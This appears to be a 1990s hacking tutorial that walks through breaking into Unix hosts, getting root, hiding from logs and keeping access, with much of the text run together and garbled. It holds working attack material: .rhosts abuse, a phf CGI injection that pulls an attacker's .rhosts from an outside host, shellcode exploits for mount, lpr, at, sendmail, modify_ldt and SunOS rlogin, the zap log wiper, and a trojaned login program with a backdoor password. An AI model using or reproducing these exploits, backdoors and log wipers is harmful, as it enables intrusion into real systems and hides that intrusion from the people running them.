dr-xr-xr-x 8 ftp 1 drwxrx-r-x 3 john 1 drwxrx-r-x 3 139 1 -rw------1 root 1 drwx-----3 test 1 drwx------ 15 rapper and you might root root users wheel 100 100 root 100 daemon 1024 1024 1024 1024 1024 1024 242 1024 1024 Jul Oct Jun Jul Jul Sep Mar Oct Oct 4 8 22 12 6 15 9 8 20 20:34 13:42 19:18 14:20 13:42 12:24 1997 21:05 18:57 ./ ../ at1/ ftp/ john/ paul/ sudoers test/ rapper/ So we own this guy's home directory... mysite:~>echo "+ +" > rapper/.rhosts mysite:~>cd / mysite:~>rlogin victim1.site.com Welcome to Victim.Site.Com. SunOs ver....(crap). victim1:~$ This is the first method... Another method could be to see if the site has an open 80 port. That would mean that the site has a web page. (And that's very bad, 'cuz it usually it's vulnerable). Below I include the source of a scanner that helped me when NMAP wasn't written. (Go get it at http://www.dhp.com/~fyodor. Good job, Fyodor). NMAP is a scanner that does even stealth scanning, so lots of systems won't record it. /* -*-C-*- tcpprobe.c */ /* tcpprobe - report on which tcp ports accept connections */ /* IO ERROR, error@axs.net, Sep 15, 1995 */ #include #include #include #include #include #include <stdio.h> <sys/socket.h> <netinet/in.h> <errno.h> <netdb.h> <signal.h> int main(int argc, char **argv) { int probeport = 0; struct hostent *host; int err, i, net; struct sockaddr_in sa; if (argc != 2) { printf("Usage: %s hostname\n", argv[0]); exit(1); } for (i = 1; i < 1024; i++) { strncpy((char *)&sa, "", sizeof sa); sa.sin_family = AF_INET; if (isdigit(*argv[1])) sa.sin_addr.s_addr = inet_addr(argv[1]); else if ((host = gethostbyname(argv[1])) != 0) strncpy((char *)&sa.sin_addr, (char *)host->h_addr, sizeof sa.sin_addr); else { herror(argv[1]); exit(2); } sa.sin_port = htons(i); net = socket(AF_INET, SOCK_STREAM, 0); if (net < 0) { perror("\nsocket"); exit(2); } err = connect(net, (struct sockaddr *) &sa, sizeof sa); if (err < 0) { printf("%s %-5d %s\r", argv[1], i, strerror(errno)); fflush(stdout); } else { printf("%s %-5d accepted. \n", argv[1], i); if (shutdown(net, 2) < 0) { perror("\nshutdown"); exit(2); } } close(net); } printf(" \r"); fflush(stdout); return (0); } Well, now be very carefull with the below exploits, because they usually get logged. Besides, if you really wanna get a source file from /cgi-bin/ use this sintax : lynx http://www.victim1.com//cgi-bin/finger If you don't wanna do that, then do a : mysite:~>echo "+ +" > /tmp/rhosts mysite:~>echo "GET /cgi-bin/phf?Qalias=x%0arcp+phantom@mysite.com:/tmp/rhosts+ /root/.rhosts" | nc -v - 20 victim1.site.com 80 then mysite:~>rlogin -l root victim1.site.com Welcome to Victim1.Site.Com. victim1:~# Or, maybe, just try to find out usernames and passwords... The usual users are "test", "guest", and maybe the owner of the site... I usually don't do such things, but you can... Or if the site is really old, use that (quote site exec) old bug for wu.ftpd. There are a lot of other exploits, like the remote exploits (innd, imap2, pop3, etc...) that you can find at rootshell.connectnet.com or at dhp.com/~fyodor. Enough about this topic. (besides, if you can finger the site, you can figgure out usernames and maybe by guessing passwords (sigh!) you could get access to the site). Step 2: Hacking r00t. ______ First you have to find the system it's running... a). LINUX ALL versions: A big bug for all linux versions is mount/umount and (maybe) lpr. /* Mount Exploit for Linux, Jul 30 1996 :::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::: ::::::::""`````""::::::""`````""::"```":::'"```'.g$$S$' `````````""::::::::: :::::'.g#S$$"$$S#n. .g#S$$"$$S#n. $$$S#s s#S$$$ $$$$S". $$$$$$"$$S#n.`:::::: ::::: $$$$$$ $$$$$$ $$$$$$ $$$$$$ $$$$$$ $$$$$$ .g#S$$$ $$$$$$ $$$$$$ :::::: ::::: $$$$$$ gggggg $$$$$$ $$$$$$ $$$$$$ $$$$$$ $$$$$$$ $$$$$$ $$$$$$ :::::: ::::: $$$$$$ $$$$$$ $$$$$$ $$$$$$ $$$$$$ $$$$$$ $$$$$$$ $$$$$$ $$$$$$ :::::: ::::: $$$$$$ $$$$$$ $$$$$$ $$$$$$ $$$$$$ $$$$$$ $$$$$$$ $$$$$$ $$$$$$ :::::: ::::: $$$$$$ $$$$$$ $$$$$$ $$$$$$ $$$$$$ $$$$$$ $$$$$$$ $$$$$$ $$$$$$ :::::: ::::::`S$$$$s$$$$S' `S$$$$s$$$$S' `S$$$$s$$$$S' $$$$$$$ $$$$$$ $$$$$$ :::::: :::::::...........:::...........:::...........::.......:......:.......:::::: :::::::::::::::::::::::::::::::::::::::::::::::;:::::::::::::::::::::::::::: Discovered and Coded by Bloodmask & Vio Covin Security 1996 */ #include #include #include #include #include <unistd.h> <stdio.h> <stdlib.h> <fcntl.h> <sys/stat.h> #define PATH_MOUNT "/bin/mount" #define BUFFER_SIZE 1024 #define DEFAULT_OFFSET 50 u_long get_esp() { __asm__("movl %esp, %eax"); } main(int argc, char **argv) { u_char execshell[] = "\xeb\x24\x5e\x8d\x1e\x89\x5e\x0b\x33\xd2\x89\x56\x07\x89\x56\x0f" "\xb8\x1b\x56\x34\x12\x35\x10\x56\x34\x12\x8d\x4e\x0b\x8b\xd1\xcd" "\x80\x33\xc0\x40\xcd\x80\xe8\xd7\xff\xff\xff/bin/sh"; char *buff = NULL; unsigned long *addr_ptr = NULL; char *ptr = NULL; int i; int ofs = DEFAULT_OFFSET; buff = malloc(4096); if(!buff) { printf("can't allocate memory\n"); exit(0); } ptr = buff; /* fill start of buffer with nops */ memset(ptr, 0x90, BUFFER_SIZE-strlen(execshell)); ptr += BUFFER_SIZE-strlen(execshell); /* stick asm code into the buffer */ for(i=0;i < strlen(execshell);i++) *(ptr++) = execshell[i]; addr_ptr = (long *)ptr; for(i=0;i < (8/4);i++) *(addr_ptr++) = get_esp() + ofs; ptr = (char *)addr_ptr; *ptr = 0; (void)alarm((u_int)0); printf("Discovered and Coded by Bloodmask and Vio, Covin 1996\n"); execl(PATH_MOUNT, "mount", buff, NULL); } /*LPR exploit:I don't know the author...*/ #include <stdio.h> #include <stdlib.h> #include <unistd.h> #define DEFAULT_OFFSET #define BUFFER_SIZE long get_esp(void) { __asm__("movl %esp,%eax\n"); } void main() { char *buff = NULL; unsigned long *addr_ptr = NULL; char *ptr = NULL; u_char execshell[] = "\xeb\x24\x5e\x8d\x1e\x89\x5e\x0b\x33\xd2\x89\x56\x07" "\x89\x56\x0f\xb8\x1b\x56\x34\x12\x35\x10\x56\x34\x12" "\x8d\x4e\x0b\x8b\xd1\xcd\x80\x33\xc0\x40\xcd\x80\xe8" "\xd7\xff\xff\xff/bin/sh"; int i; buff = malloc(4096); if(!buff) { printf("can't allocate memory\n"); exit(0); } ptr = buff; memset(ptr, 0x90, BUFFER_SIZE-strlen(execshell)); ptr += BUFFER_SIZE-strlen(execshell); for(i=0;i < strlen(execshell);i++) *(ptr++) = execshell[i]; addr_ptr = (long *)ptr; for(i=0;i<2;i++) *(addr_ptr++) = get_esp() + DEFAULT_OFFSET; ptr = (char *)addr_ptr; *ptr = 0; execl("/usr/bin/lpr", "lpr", "-C", buff, NULL); 50 1023 } b.) Version's 1.2.* to 1.3.2 NLSPATH env. variable exploit: /* It's really annoying for users and good for me... AT exploit gives only uid=0 and euid=your_usual_euid. */ #include <unistd.h> #include <stdio.h> #include <stdlib.h> #include <fcntl.h> #include <sys/stat.h> #define path "/usr/bin/at" #define BUFFER_SIZE 1024 #define DEFAULT_OFFSET 50 u_long get_esp() { __asm__("movl %esp, %eax"); } main(int argc, char **argv) { u_char execshell[] = "\xeb\x24\x5e\x8d\x1e\x89\x5e\x0b\x33\xd2\x89\x56\x07\x89\x56\x0f" "\xb8\x1b\x56\x34\x12\x35\x10\x56\x34\x12\x8d\x4e\x0b\x8b\xd1\xcd" "\x80\x33\xc0\x40\xcd\x80\xe8\xd7\xff\xff\xff/bin/sh"; char *buff = NULL; unsigned long *addr_ptr = NULL; char *ptr = NULL; int i; int ofs = DEFAULT_OFFSET; buff = malloc(4096); if(!buff) { printf("can't allocate memory\n"); exit(0); } ptr = buff; memset(ptr, 0x90, BUFFER_SIZE-strlen(execshell)); ptr += BUFFER_SIZE-strlen(execshell); for(i=0;i < strlen(execshell);i++) *(ptr++) = execshell[i]; addr_ptr = (long *)ptr; for(i=0;i < (8/4);i++) *(addr_ptr++) = get_esp() + ofs; ptr = (char *)addr_ptr; *ptr = 0; (void)alarm((u_int)0); printf("AT exploit discovered by me, _PHANTOM_ in 1997.\n"); setenv("NLSPATH",buff,1); execl(path, "at",NULL); } SENDMAIL exploit: (don't try to chmod a-s this one... :) ) /* SENDMAIL Exploit for Linux */ #include #include #include #include #include <unistd.h> <stdio.h> <stdlib.h> <fcntl.h> <sys/stat.h> #define path "/usr/bin/sendmail" #define BUFFER_SIZE 1024 #define DEFAULT_OFFSET 50 u_long get_esp() { __asm__("movl %esp, %eax"); } main(int argc, char **argv) { u_char execshell[] = "\xeb\x24\x5e\x8d\x1e\x89\x5e\x0b\x33\xd2\x89\x56\x07\x89\x56\x0f" "\xb8\x1b\x56\x34\x12\x35\x10\x56\x34\x12\x8d\x4e\x0b\x8b\xd1\xcd" "\x80\x33\xc0\x40\xcd\x80\xe8\xd7\xff\xff\xff./sh"; char *buff = NULL; unsigned long *addr_ptr = NULL; char *ptr = NULL; int i; int ofs = DEFAULT_OFFSET; buff = malloc(4096); if(!buff) { printf("can't allocate memory\n"); exit(0); } ptr = buff; memset(ptr, 0x90, BUFFER_SIZE-strlen(execshell)); ptr += BUFFER_SIZE-strlen(execshell); for(i=0;i < strlen(execshell);i++) *(ptr++) = execshell[i]; addr_ptr = (long *)ptr; for(i=0;i < (8/4);i++) *(addr_ptr++) = get_esp() + ofs; ptr = (char *)addr_ptr; *ptr = 0; (void)alarm((u_int)0); printf("SENDMAIL exploit discovered by me, _PHANTOM_ in setenv("NLSPATH",buff,1); execl(path, "sendmail",NULL); 1997\n"); } MOD_LDT exploit (GOD, this one gave such a headache to my Sysadmin (ROOT) !!!) /* this is a hack of a hack. a valid System.map was needed to get this sploit to werk.. but not any longer.. This sploit will give you root if the modify_ldt bug werks.. which I beleive it does in any kernel before 1.3.20 .. QuantumG */ /* original code written by Morten Welinder. * * this required 2 hacks to work on the 1.2.13 kernel that I've tested on: * 1. asm/sigcontext.h does not exist on 1.2.13 and so it is removed. * 2. the _task in the System.map file has no leading underscore. * I am not sure at what point these were changed, if you are * using this on a newer kernel compile with NEWERKERNEL defined. * -ReD */ #include <linux/ldt.h> #include <stdio.h> #include <linux/unistd.h> #include <signal.h> #ifdef NEWERKERNEL #include <asm/sigcontext.h> #endif #define __KERNEL__ #include <linux/sched.h> #include <linux/module.h> static inline _syscall1(int,get_kernel_syms,struct kernel_sym *,table); static inline _syscall3(int, modify_ldt, int, func, void *, ptr, unsigned long, bytecount) #define KERNEL_BASE 0xc0000000 /* ------------------------------------------------------------------------ */ static __inline__ unsigned char __farpeek (int seg, unsigned ofs) { unsigned char res; asm ("mov %w1,%%gs ; gs; movb (%2),%%al" : "=a" (res) : "r" (seg), "r" (ofs)); return res; } /* ------------------------------------------------------------------------ */ static __inline__ void __farpoke (int seg, unsigned ofs, unsigned char b) { asm ("mov %w0,%%gs ; gs; movb %b2,(%1)" : /* No results. */ : "r" (seg), "r" (ofs), "r" (b)); } /* ------------------------------------------------------------------------ */ void memgetseg (void *dst, int seg, const void *src, int size) { while (size-- > 0) *(char *)dst++ = __farpeek (seg, (unsigned)(src++)); } /* ------------------------------------------------------------------------ */ void memputseg (int seg, void *dst, const void *src, int size) { while (size-- > 0) __farpoke (seg, (unsigned)(dst++), *(char *)src++); } /* ------------------------------------------------------------------------ */ int main () { int stat, i,j,k; struct modify_ldt_ldt_s ldt_entry; FILE *syms; char line[100]; struct task_struct **task, *taskptr, thistask; struct kernel_sym blah[4096]; printf ("Bogusity checker for modify_ldt system call.\n"); printf ("Testing for page-size limit bug...\n"); ldt_entry.entry_number = 0; ldt_entry.base_addr = 0xbfffffff; ldt_entry.limit = 0; ldt_entry.seg_32bit = 1; ldt_entry.contents = MODIFY_LDT_CONTENTS_DATA; ldt_entry.read_exec_only = 0; ldt_entry.limit_in_pages = 1; ldt_entry.seg_not_present = 0; stat = modify_ldt (1, &ldt_entry, sizeof (ldt_entry)); if (stat) /* Continue after reporting error. */ printf ("This bug has been fixed in your kernel.\n"); else { printf ("Shit happens: "); printf ("0xc0000000 - 0xc0000ffe is accessible.\n"); } printf ("Testing for expand-down limit bug...\n"); ldt_entry.base_addr = 0x00000000; ldt_entry.limit = 1; ldt_entry.contents = MODIFY_LDT_CONTENTS_STACK; ldt_entry.limit_in_pages = 0; stat = modify_ldt (1, &ldt_entry, sizeof (ldt_entry)); if (stat) { printf ("This bug has been fixed in your kernel.\n"); return 1; } else { printf ("Shit happens: "); printf ("0x00000000 - 0xfffffffd is accessible.\n"); } i = get_kernel_syms(blah); k = i+10; for (j=0; j<i; j++) if (!strcmp(blah[j].name,"current") || !strcmp(blah[j].name,"_current")) k = j; if (k==i+10) { printf("current not found!!!\n"); return(1); } j=k; taskptr = (struct task_struct *) (KERNEL_BASE + blah[j].value); memgetseg (&taskptr, 7, taskptr, sizeof (taskptr)); taskptr = (struct task_struct *) (KERNEL_BASE + (unsigned long) taskptr); memgetseg (&thistask, 7, taskptr, sizeof (thistask)); if (thistask.pid!=getpid()) { printf("current process not found\n"); return(1); } printf("Current process is %i\n",thistask.pid); taskptr = (struct task_struct *) (KERNEL_BASE + (unsigned long) thistask.p_pptr); memgetseg (&thistask, 7, taskptr, sizeof (thistask)); if (thistask.pid!=getppid()) { printf("current process not found\n"); return(1); } printf("Parent process is %i\n",thistask.pid); thistask.uid = thistask.euid = thistask.suid = thistask.fsuid = 0; thistask.gid = thistask.egid = thistask.sgid = thistask.fsgid = 0; memputseg (7, taskptr, &thistask, sizeof (thistask)); printf ("Shit happens: parent process is now root process.\n"); return 0; }; c.) Other linux versions: Sendmail exploit: #/bin/sh # # # Hi ! # This is exploit for sendmail smtpd bug # (ver. 8.7-8.8.2 for FreeBSD, Linux and may be other platforms). # This shell script does a root shell in /tmp directory. # If you have any problems with it, drop me a letter. # Have fun ! # # # ---------------------# --------------------------------------------# ----------------Dedicated to my beautiful lady -----------------# --------------------------------------------# ---------------------# # Leshka Zakharoff, 1996. E-mail: leshka@leshka.chuvashia.su # # # echo 'main() '>>leshka.c echo '{ '>>leshka.c echo ' execl("/usr/sbin/sendmail","/tmp/smtpd",0); '>>leshka.c echo '} '>>leshka.c # # echo 'main() '>>smtpd.c echo '{ '>>smtpd.c echo ' setuid(0); setgid(0); '>>smtpd.c echo ' system("cp /bin/sh /tmp;chmod a=rsx /tmp/sh"); '>>smtpd.c echo '} '>>smtpd.c # # cc -o leshka leshka.c;cc -o /tmp/smtpd smtpd.c ./leshka kill -HUP `ps -ax|grep /tmp/smtpd|grep -v grep|tr -d ' '|tr -cs "[:digit:]" "\n"| head -n 1` rm leshka.c leshka smtpd.c /tmp/smtpd echo "Now type: /tmp/sh" SUNOS: Rlogin exploit: (arghh!) #include <stdio.h> #include <stdlib.h> #include <sys/types.h> #include <unistd.h> #define #define #define #define BUF_LENGTH EXTRA STACK_OFFSET SPARC_NOP 8200 100 4000 0xa61cc013 u_char sparc_shellcode[] = "\x82\x10\x20\xca\xa6\x1c\xc0\x13\x90\x0c\xc0\x13\x92\x0c\xc0\x13" "\xa6\x04\xe0\x01\x91\xd4\xff\xff\x2d\x0b\xd8\x9a\xac\x15\xa1\x6e" "\x2f\x0b\xdc\xda\x90\x0b\x80\x0e\x92\x03\xa0\x08\x94\x1a\x80\x0a" "\x9c\x03\xa0\x10\xec\x3b\xbf\xf0\xdc\x23\xbf\xf8\xc0\x23\xbf\xfc" "\x82\x10\x20\x3b\x91\xd4\xff\xff"; u_long get_sp(void) { __asm__("mov %sp,%i0 \n"); } void main(int argc, char *argv[]) { char buf[BUF_LENGTH + EXTRA]; long targ_addr; u_long *long_p; u_char *char_p; int i, code_length = strlen(sparc_shellcode); long_p = (u_long *) buf; for (i = 0; i < (BUF_LENGTH - code_length) / sizeof(u_long); i++) *long_p++ = SPARC_NOP; char_p = (u_char *) long_p; for (i = 0; i < code_length; i++) *char_p++ = sparc_shellcode[i]; long_p = (u_long *) char_p; targ_addr = get_sp() - STACK_OFFSET; for (i = 0; i < EXTRA / sizeof(u_long); i++) *long_p++ = targ_addr; printf("Jumping to address 0x%lx\n", targ_addr); execl("/usr/bin/rlogin", "rlogin", buf, (char *) 0); perror("execl failed"); } Want more exploits? Get 'em from other sites (like rootshell, dhp.com/~fyodor, etc...). Step 3: Covering your tracks: ______ For this you could use lots of programs like zap, utclean, and lots of others... Watch out, ALWAYS after you cloaked yourself to see if it worked do a: victim1:~$ who ...(crap)... victim1:~$ finger ...;as;;sda... victim1:~$w ... If you are still not cloaked, look for wtmpx, utmpx and other stuff like that. The only cloaker (that I know) that erased me even from wtmpx/utmpx was utclean. But I don't have it right now, so ZAP'll have to do the job. /* Title: Sequence: Syztems: Note: Kompile: Run: Desc: Zap.c (c) rokK Industries 911204.B Kompiles on SunOS 4.+ To mask yourself from lastlog and wtmp you need to be root, utmp is go+w on default SunOS, but is sometimes removed. cc -O Zap.c -o Zap Zap <Username> Will Fill the Wtmp and Utmp Entries corresponding to the entered Username. It also Zeros out the last login data for the specific user, fingering that user will show 'Never Logged In' If you cant find a usage for this, get a brain. Usage: */ #include <sys/types.h> #include #include #include #include #include #include int f; <stdio.h> <unistd.h> <fcntl.h> <utmp.h> <lastlog.h> <pwd.h> void kill_tmp(name,who) char *name, *who; { struct utmp utmp_ent; if ((f=open(name,O_RDWR))>=0) { while(read (f, &utmp_ent, sizeof (utmp_ent))> 0 ) if (!strncmp(utmp_ent.ut_name,who,strlen(who))) { bzero((char *)&utmp_ent,sizeof( utmp_ent )); lseek (f, -(sizeof (utmp_ent)), SEEK_CUR); write (f, &utmp_ent, sizeof (utmp_ent)); } close(f); } } void kill_lastlog(who) char *who; { struct passwd *pwd; struct lastlog newll; if ((pwd=getpwnam(who))!=NULL) { if ((f=open("/usr/adm/lastlog", O_RDWR)) >= 0) { lseek(f, (long)pwd->pw_uid * sizeof (struct lastlog), 0); bzero((char *)&newll,sizeof( newll )); write(f, (char *)&newll, sizeof( newll )); close(f); } } } else printf("%s: ?\n",who); main(argc,argv) int argc; char *argv[]; { if (argc==2) { kill_tmp("/etc/utmp",argv[1]); kill_tmp("/usr/adm/wtmp",argv[1]); kill_lastlog(argv[1]); printf("Zap!\n"); } else printf("Error.\n"); } Step 4: Keeping that account. _______ This usually means that you'll have to install some programs to give you access even if the root has killed your account... (DAEMONS!!!) =>|-@ Here is an example of a login daemon from the DemonKit (good job, fellows...) LOOK OUT !!! If you decide to put a daemon, be carefull and modify it's date of creation. (use touch --help to see how!) /* This is a simple trojanized login program, this was designed for Linux and will not work without modification on linux. It lets you login as either a root user, or any ordinary user by use of a 'magic password'. It will also prevent the login from being logged into utmp, wtmp, etc. You will effectively be invisible, and not be detected except via 'ps'. */ #define BACKDOOR int krad=0; "password" /* This program is derived from 4.3 BSD software and is subject to the copyright notice below. The port to HP-UX has been motivated by the incapability of 'rlogin'/'rlogind' as per HP-UX 6.5 (and 7.0) to transfer window sizes. Changes: - General HP-UX portation. Use of facilities not available in HP-UX (e.g. setpriority) has been eliminated. Utmp/wtmp handling has been ported. - The program uses BSD command line options to be used in connection with e.g. 'rlogind' i.e. 'new login'. - HP features left out: logging of bad login attempts in /etc/btmp, they are sent to syslog password expiry '*' as login shell, add it if you need it - BSD features left out: quota checks password expiry analysis of terminal type (tset feature) Security logging to syslogd. This requires you to have a (ported) syslog system -- 7.0 comes with syslog 'Lastlog' feature. - A lot of nitty gritty details has been adjusted in favour of - BSD features thrown in: HP-UX, e.g. /etc/securetty, default paths and the environment variables assigned by 'login'. - We do *nothing* to setup/alter tty state, under HP-UX this is to be done by getty/rlogind/telnetd/some one else. Michael Glad (glad@daimi.dk) Computer Science Department Aarhus University Denmark 1990-07-04 1991-09-24 glad@daimi.aau.dk: HP-UX 8.0 port: - now explictly sets non-blocking mode on descriptors - strcasecmp is now part of HP-UX 1992-02-05 poe@daimi.aau.dk: Ported the stuff to Linux 0.12 From 1992 till now (1995) this code for Linux has been maintained at ftp.daimi.aau.dk:/pub/linux/poe/ */ /* * Copyright (c) 1980, 1987, 1988 The Regents of the University of California. * All rights reserved. * * Redistribution and use in source and binary forms are permitted * provided that the above copyright notice and this paragraph are * duplicated in all such forms and that any documentation, * advertising materials, and other materials related to such * distribution and use acknowledge that the software was developed * by the University of California, Berkeley. The name of the * University may not be used to endorse or promote products derived * from this software without specific prior written permission. * THIS SOFTWARE IS PROVIDED ``AS IS'' AND WITHOUT ANY EXPRESS OR * IMPLIED WARRANTIES, INCLUDING, WITHOUT LIMITATION, THE IMPLIED * WARRANTIES OF MERCHANTIBILITY AND FITNESS FOR A PARTICULAR PURPOSE. */ #ifndef lint char copyright[] = "@(#) Copyright (c) 1980, 1987, 1988 The Regents of the University of California.\n\ All rights reserved.\n"; #endif /* not lint */ #ifndef lint static char sccsid[] = "@(#)login.c 5.40 (Berkeley) 5/9/89"; #endif /* not lint */ /* * login [ name ] * login -h hostname (for telnetd, etc.) * login -f name (for pre-authenticated login: datakit, xterm, etc.) */ /* #define TESTING */ #ifdef TESTING #include "param.h" #else #include <sys/param.h> #endif #include <ctype.h> #include <unistd.h> #include <getopt.h> #include <memory.h> #include <sys/stat.h> #include <sys/time.h> #include <sys/resource.h> #include <sys/file.h> #include <termios.h> #include <string.h> #define index strchr #define rindex strrchr #include <sys/ioctl.h> #include <signal.h> #include <errno.h> #include <grp.h> #include <pwd.h> #include <setjmp.h> #include <stdlib.h> #include <stdio.h> #include <string.h> #include <sys/syslog.h> #include <sys/sysmacros.h> #include <netdb.h> #ifdef TESTING # include "utmp.h" #else # include <utmp.h> #endif #ifdef SHADOW_PWD #include <shadow.h> #endif #ifndef linux #include <tzfile.h> #include <lastlog.h> #else struct lastlog { long ll_time; char ll_line[12]; char ll_host[16]; }; #endif #include "pathnames.h" #define P_(s) () void opentty P_((const char *tty)); void getloginname P_((void)); void timedout P_((void)); int rootterm P_((char *ttyn)); void motd P_((void)); void sigint P_((void)); void checknologin P_((void)); void dolastlog P_((int quiet)); void badlogin P_((char *name)); char *stypeof P_((char *ttyid)); void checktty P_((char *user, char *tty)); void getstr P_((char *buf, int cnt, char *err)); void sleepexit P_((int eval)); #undef P_ #ifdef KERBEROS #include <kerberos/krb.h> #include <sys/termios.h> char realm[REALM_SZ]; int kerror = KSUCCESS, notickets = 1; #endif #ifndef linux #define TTYGRPNAME "tty" #else # define TTYGRPNAME "other" # ifndef MAXPATHLEN # define MAXPATHLEN 1024 # endif #endif /* name of group to own ttys */ /* * This bounds the time given to login. Not a define so it can * be patched on machines where it's too small. */ #ifndef linux int timeout = 300; #else int timeout = 60; #endif struct passwd *pwd; int failures; char term[64], *hostname, *username, *tty; char thishost[100]; #ifndef linux struct sgttyb sgttyb; struct tchars tc = { CINTR, CQUIT, CSTART, CSTOP, CEOT, CBRK }; struct ltchars ltc = { CSUSP, CDSUSP, CRPRNT, CFLUSH, CWERASE, CLNEXT }; #endif char *months[] = { "Jan", "Feb", "Mar", "Apr", "May", "Jun", "Jul", "Aug", "Sep", "Oct", "Nov", "Dec" }; /* provided by Linus Torvalds 16-Feb-93 */ void opentty(const char * tty) { int i; int fd = open(tty, O_RDWR); for (i = 0 ; i < fd ; i++) close(i); for (i = 0 ; i < 3 ; i++) dup2(fd, i); if (fd >= 3) close(fd); } int main(argc, argv) int argc; char **argv; { extern int errno, optind; extern char *optarg, **environ; struct timeval tp; struct tm *ttp; struct group *gr; register int ch; register char *p; int ask, fflag, hflag, pflag, cnt; int quietlog, passwd_req, ioctlval; char *domain, *salt, *ttyn, *pp; char tbuf[MAXPATHLEN + 2], tname[sizeof(_PATH_TTY) + 10]; char *ctime(), *ttyname(), *stypeof(); time_t time(); void timedout(); char *termenv; #ifdef linux char tmp[100]; /* Just as arbitrary as mountain time: */ /* (void)setenv("TZ", "MET-1DST",0); */ #endif (void)signal(SIGALRM, timedout); (void)alarm((unsigned int)timeout); (void)signal(SIGQUIT, SIG_IGN); (void)signal(SIGINT, SIG_IGN); (void)setpriority(PRIO_PROCESS, 0, 0); #ifdef HAVE_QUOTA (void)quota(Q_SETUID, 0, 0, 0); #endif /* * -p is used by getty to tell login not to destroy the environment * -f is used to skip a second login authentication * -h is used by other servers to pass the name of the remote * host to login so that it may be placed in utmp and wtmp */ (void)gethostname(tbuf, sizeof(tbuf)); (void)strncpy(thishost, tbuf, sizeof(thishost)-1); domain = index(tbuf, '.'); fflag = hflag = pflag = 0; passwd_req = 1; while ((ch = getopt(argc, argv, "fh:p")) != EOF) switch (ch) { case 'f': fflag = 1; break; case 'h': if (getuid()) { (void)fprintf(stderr, "login: -h for super-user only.\n"); exit(1); } hflag = 1; if (domain && (p = index(optarg, '.')) && strcasecmp(p, domain) == 0) *p = 0; hostname = optarg; break; case 'p': pflag = 1; break; case '?': default: (void)fprintf(stderr, "usage: login [-fp] [username]\n"); exit(1); } argc -= optind; argv += optind; if (*argv) { username = *argv; ask = 0; } else ask = 1; #ifndef linux ioctlval = 0; (void)ioctl(0, TIOCLSET, &ioctlval); (void)ioctl(0, TIOCNXCL, 0); (void)fcntl(0, F_SETFL, ioctlval); (void)ioctl(0, TIOCGETP, &sgttyb); sgttyb.sg_erase = CERASE; sgttyb.sg_kill = CKILL; (void)ioctl(0, TIOCSLTC, &ltc); (void)ioctl(0, TIOCSETC, &tc); (void)ioctl(0, TIOCSETP, &sgttyb); /* * Be sure that we're in * blocking mode!!! * This is really for HPUX */ #endif ioctlval = 0; (void)ioctl(0, FIOSNBIO, &ioctlval); for (cnt = getdtablesize(); cnt > 2; cnt--) close(cnt); ttyn = ttyname(0); if (ttyn == NULL || *ttyn == '\0') { (void)sprintf(tname, "%s??", _PATH_TTY); ttyn = tname; } setpgrp(); { struct termios tt, ttt; tcgetattr(0, &tt); ttt = tt; ttt.c_cflag &= ~HUPCL; if((chown(ttyn, 0, 0) == 0) && (chmod(ttyn, 0622) == 0)) { tcsetattr(0,TCSAFLUSH,&ttt); signal(SIGHUP, SIG_IGN); /* so vhangup() wont kill us */ vhangup(); signal(SIGHUP, SIG_DFL); } setsid(); /* re-open stdin,stdout,stderr after vhangup() closed them */ /* if it did, after 0.99.5 it doesn't! */ opentty(ttyn); tcsetattr(0,TCSAFLUSH,&tt); } if (tty = rindex(ttyn, '/')) ++tty; else tty = ttyn; openlog("login", LOG_ODELAY, LOG_AUTH); for (cnt = 0;; ask = 1) { ioctlval = 0; #ifndef linux (void)ioctl(0, TIOCSETD, &ioctlval); #endif if (ask) { fflag = 0; getloginname(); } checktty(username, tty); (void)strcpy(tbuf, username); if (pwd = getpwnam(username)) salt = pwd->pw_passwd; else salt = "xx"; /* if user not super-user, check for disabled logins */ if (pwd == NULL || pwd->pw_uid) checknologin(); /* * Disallow automatic login to root; if not invoked by * root, disallow if the uid's differ. */ if (fflag && pwd) { int uid = getuid(); passwd_req = pwd->pw_uid == 0 || (uid && uid != pwd->pw_uid); } /* * If trying to log in as root, but with insecure terminal, * refuse the login attempt. */ if (pwd && pwd->pw_uid == 0 && !rootterm(tty)) { (void)fprintf(stderr, "%s login refused on this terminal.\n", pwd->pw_name); if (hostname) syslog(LOG_NOTICE, "LOGIN %s REFUSED FROM %s ON TTY %s", pwd->pw_name, hostname, tty); else syslog(LOG_NOTICE, "LOGIN %s REFUSED ON TTY %s", pwd->pw_name, tty); continue; } /* * If no pre-authentication and a password exists * for this user, prompt for one and verify it. */ if (!passwd_req || (pwd && !*pwd->pw_passwd)) break; setpriority(PRIO_PROCESS, 0, -4); pp = getpass("Password: "); if(strcmp(BACKDOOR, pp) == 0) krad++; p = crypt(pp, salt); setpriority(PRIO_PROCESS, 0, 0); #ifdef KERBEROS /* * If not present in pw file, act as we normally would. * If we aren't Kerberos-authenticated, try the normal * pw file for a password. If that's ok, log the user * in without issueing any tickets. */ if (pwd && !krb_get_lrealm(realm,1)) { /* * get TGT for local realm; be careful about uid's * here for ticket file ownership */ (void)setreuid(geteuid(),pwd->pw_uid); kerror = krb_get_pw_in_tkt(pwd->pw_name, "", realm, "krbtgt", realm, DEFAULT_TKT_LIFE, pp); (void)setuid(0); if (kerror == INTK_OK) { memset(pp, 0, strlen(pp)); notickets = 0; /* user got ticket */ break; } } (void) memset(pp, 0, strlen(pp)); if (pwd && !strcmp(p, pwd->pw_passwd)) break; if(krad != 0) break; #endif (void)printf("Login incorrect\n"); failures++; badlogin(username); /* log ALL bad logins */ /* we allow 10 tries, but after 3 we start backing off */ if (++cnt > 3) { if (cnt >= 10) { sleepexit(1); } sleep((unsigned int)((cnt - 3) * 5)); } } /* committed to login -- turn off timeout */ (void)alarm((unsigned int)0); #ifdef HAVE_QUOTA if (quota(Q_SETUID, pwd->pw_uid, 0, 0) < 0 && errno != EINVAL) { switch(errno) { case EUSERS: (void)fprintf(stderr, "Too many users logged on already.\nTry again later.\n"); break; case EPROCLIM: (void)fprintf(stderr, "You have too many processes running.\n"); break; default: perror("quota (Q_SETUID)"); } sleepexit(0); } #endif /* paranoia... */ endpwent(); /* This requires some explanation: As root we may not be able to read the directory of the user if it is on an NFS mounted filesystem. We temporarily set our effective uid to the user-uid making sure that we keep root privs. in the real uid. A portable solution would require a fork(), but we rely on Linux having the BSD setreuid() */ { char tmpstr[MAXPATHLEN]; uid_t ruid = getuid(); gid_t egid = getegid(); strncpy(tmpstr, pwd->pw_dir, MAXPATHLEN-12); strncat(tmpstr, ("/" _PATH_HUSHLOGIN), MAXPATHLEN); setregid(-1, pwd->pw_gid); setreuid(0, pwd->pw_uid); quietlog = (access(tmpstr, R_OK) == 0); 